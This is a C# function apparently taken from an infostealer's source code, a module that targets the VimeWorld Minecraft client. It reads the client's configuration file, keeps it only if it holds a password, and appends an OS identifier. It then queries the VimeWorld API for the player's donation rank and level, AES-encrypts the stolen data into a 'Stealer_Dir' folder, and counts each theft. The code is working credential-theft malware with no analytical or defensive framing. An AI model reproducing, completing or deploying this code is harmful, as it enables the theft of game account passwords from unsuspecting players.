public static void Get()
 {
     try
     {
         string Stealer_Dir = Help.StealerDir;
         if (!File.Exists(patchConfig))
         {
             return;
         }
         string ConfigText;
         using (StreamReader myReader = new StreamReader(patchConfig))
         {
             ConfigText = myReader.ReadToEnd();
         }
         if (!ConfigText.Contains("password"))
         {
             return;
         }
         string patch = Stealer_Dir + @"\VimeWorld";
         Directory.CreateDirectory(patch);
         if (Config.MinecraftModule == true)
         {
             WebClient wc = new WebClient();
             InfoPlayer = wc.DownloadString(Help.VimeAPI + Vime.NickName());
         }
         string destFile = Path.Combine(patch, (Config.MinecraftModule == true ? Donate() + Level():"") + NickName());
         ConfigText = ConfigText + "||||" + OSSUID();
         ConfigText = AES.EncryptStringAES(ConfigText, Config.key);
         using (StreamWriter myWriter = new StreamWriter(destFile))
         {
             myWriter.WriteLine(ConfigText);
         }
         Counting.VimeWorld++;
     }
     catch (Exception e)
     {
         Console.WriteLine(e + "Ошибка с Vime.Get");
     }
 }